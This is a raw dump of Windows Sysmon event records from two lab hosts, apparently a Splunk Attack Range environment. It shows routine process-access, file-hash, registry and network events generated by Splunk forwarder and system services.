14:19:23.176{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205535Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:23.176{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205534Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:23.176{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205533Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:23.176{2E1864BB-E13C-6299-0500-000000005F02}416432C:\Windows\system32\csrss.exe{2E1864BB-186B-629A-5942-000000005F02}2764C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000205532Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:23.176{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-186B-629A-5942-000000005F02}2764C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000205531Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:23.177{2E1864BB-186B-629A-5942-000000005F02}2764C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000205542Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:24.485{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D36D1826790FEB2AA1A9532C35B06BA4,SHA256=1AA47333FBC0E1F1E84016F95D8E6D3DF8B7B6A1D4D639FD0083711B06AAB62C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044446Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:24.045{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4346A2FBE684CE204D8FA2814A61FE65,SHA256=2CFBBD9D803D134DD001277C551C6642796E83665E183E3C37C0CCDE1C80271E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205541Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:21.863{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56388-false10.0.1.12-8000- 23542300x8000000000000000205540Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:24.201{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F9A276D91AB7F4B9C2DCA508D4458F98,SHA256=112747CA9879DB784517D89FF91C072739F0D1CDDE07B2533E734C13C3BF55E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205543Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:25.585{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A32F3A31BA0CBAE25C451E1BA923F9B,SHA256=D6A26B62AFAB01682FE1779C6FD9982459E4DBB91FDD06241AB01082426F6645,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044447Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:25.138{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3FFB8DA49062C873AB55D8CFBAA8042A,SHA256=54609E1CCC97AF7A574ECC977C5C53E7CB0F56F15050E488686A14133A9FAB03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205544Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:26.668{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75D24F926B73201B8963B2B765B0B856,SHA256=FC50DC92BD66166DC97F4E958C5085A72A27A3FC0CB8CC539CA46CD0193A28A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044448Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:26.232{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74E38C91794F7B69FAF716DD927452D5,SHA256=6E7A8AAE58C24203C99F4C5EE69EE5EB02E9C6BD639ED6AED5C09F5EE4383682,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205545Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:27.785{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8FF3B50D57F84312D3D820D14264BB1,SHA256=273A4D220E9386000CC90B342D34B3409834D01BD101BB7CF45A0FB4F97AF0B7,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044450Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:24.789{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52360-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000044449Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:27.326{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6564AA52EBF4EB4C3F4C561E704515E3,SHA256=A8170B0AD92D23C9CF207DDC1268A56F331D02D7F8EDB3350F1C266D8688BF45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205546Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:28.886{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92D678B51C8BDEF12449DDF79B429F23,SHA256=479DD878B26BF98045BC7FC340A9C777E10A048B6E1D4F6BF23D87F844380303,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044451Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:28.420{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=952A9E4D9847AE034D006800F0FFD208,SHA256=00FA3E0C94A900D6B7F0192D8CD82B12BD3C4D35B45F01F31B6D3DC9C8FA9D66,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205548Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:29.987{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C8C78160CD17C24FF0C56B66EC385F5,SHA256=128C4E80B53DB9C56FF036E9755F87C29F6EB99B707637B2EB7B1A038A15EC5C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044452Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:29.513{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31246043005E2392F6FCF7B4948AACB1,SHA256=B9D649D890B500B3E7DEF5E368B1A87C3CC22056C5C968C4C58927F6D910FDD0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205547Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:27.694{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56389-false10.0.1.12-8000- 23542300x800000000000000044453Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:30.607{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89FEE6F78F1BDAEEB48339835690A5D9,SHA256=FD2FC270DB14667B877B55452DF4417EE7A532DBD29E2284BE4337DE79B1CA8C,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000205549Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-SetValue2022-06-03 14:19:30.652{2E1864BB-E13E-6299-1200-000000005F02}700C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d87754-0xf0b120cc) 23542300x800000000000000044454Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:31.701{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=186F4BBBFF5300EC4AAEE9A2A5CB29F7,SHA256=DBBFC78A5CDCE9187C875D5D12E33BAA3E17A9AE76A87C1EA044712498059EA5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205550Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:31.122{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBDD1CE18A468946F5B28B986F414129,SHA256=85030A0727D96929AE5F5570B38B7B39ACB95248CCB186E0835E293E1F27E832,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044455Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:32.795{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7699D876C3B357DD89C2AD01FA5A427A,SHA256=E65FF3C4E586D71515E96C83EA5F3978C4F4095EEE500CD4C047E6CCB3AC03F8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205553Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:30.254{2E1864BB-E13E-6299-1200-000000005F02}700C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local123ntpfalse40.119.148.38-123ntp 354300x8000000000000000205552Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:30.246{2E1864BB-E13E-6299-1200-000000005F02}700C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local123ntpfalse40.119.148.38-123ntp 23542300x8000000000000000205551Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:32.252{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5019DB9B878970514352CAE2DD5A76A2,SHA256=8FF3E4367E33AA47E1FA469F7FBF4A84E6E24948EF012456ED8891DC0A503FE3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044457Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:33.904{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=059587BB3576FEA1EC6841CD57F6174F,SHA256=00D74D37B6A9A810166EC2AB0736F6D7D7AF2EC08A19CC0DB9698D8B59814A14,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205554Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:33.367{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B38E978025B0FA9D8B63C9A9116FD141,SHA256=2D926740EF759185F1C0166E9FEFF167AF5A52E3CEA05089171452111A6FD2D2,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044456Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:30.679{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52361-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000044458Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:34.998{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A3F1C36389128157F8F3FA47E76510C,SHA256=7E92F4909D1F5596BAAAAA1F9CE92C57985A1112775B37692357C4AD964B7F5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205556Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:34.467{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CACD4A53CDF4EA15A01CA4EE14B6ECA2,SHA256=68CFA295637988F6F1C256D3295F4F4FCA582250DFBFDA01095CE564A14D5538,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205555Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:32.793{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56390-false10.0.1.12-8000- 23542300x8000000000000000205557Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:35.467{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D33FB766B0A1B76B2449CFB22FD0B4CA,SHA256=E27F42CACA87A6063D325D65C69BFAB94245B9B83F6E9481EF5BCEF28E3EA140,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205558Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:36.504{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF068C396DA3A849226B5BB484F0016A,SHA256=0C3242C697FD0EB77463B561291CAD3A395937700FDCA33704204C2A2A9E8564,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044459Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:36.091{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C26F15C0E0105774F72C39F9A3F9EA8,SHA256=BC41B28CB40366A16A33DCBAF037D226425E519767493E5732623275DF1970F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205559Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:37.550{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B5033D537BCBE818D905348BA0629A8,SHA256=B9D5B01B126678005C53DEB99CEDBACF552E2DDD5C4933658E928718BBA6DD76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044460Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:37.185{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC7E1757141CEDBEC5543B8627F3E8D1,SHA256=3EB26C561332D4E8C8C52A7C45E21BDE755B0E1EA14670E2A452B7E1C38C3A8B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205566Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:38.684{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2D71441FC614A14ECA3BF78F7A3D1A5,SHA256=C34AD8E660AC589207A9583EE001CF6B6B16A294C21C9B35AFBCDF7D9BCB2474,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044462Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:35.804{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52362-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000044461Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:38.279{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84C017DB895F34FA322F749A69225B69,SHA256=E431A37183EA454C613AB0B39C9A9303A40BC41B8BF0E9194E339D3E4B63A4FE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000205565Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:38.403{2E1864BB-FA2C-6299-4D07-000000005F02}33766668C:\Windows\Explorer.EXE{2E1864BB-FA4D-6299-5F07-000000005F02}6532C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+db054|C:\Windows\System32\SHELL32.dll+dbc07|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13beff|C:\Windows\System32\windows.storage.dll+13ac83|C:\Windows\System32\windows.storage.dll+1391af|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205564Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:38.387{2E1864BB-FA2C-6299-4D07-000000005F02}33765148C:\Windows\Explorer.EXE{2E1864BB-FA4D-6299-5F07-000000005F02}6532C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+db054|C:\Windows\System32\SHELL32.dll+dc340|C:\Windows\System32\TwinUI.dll+100021|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 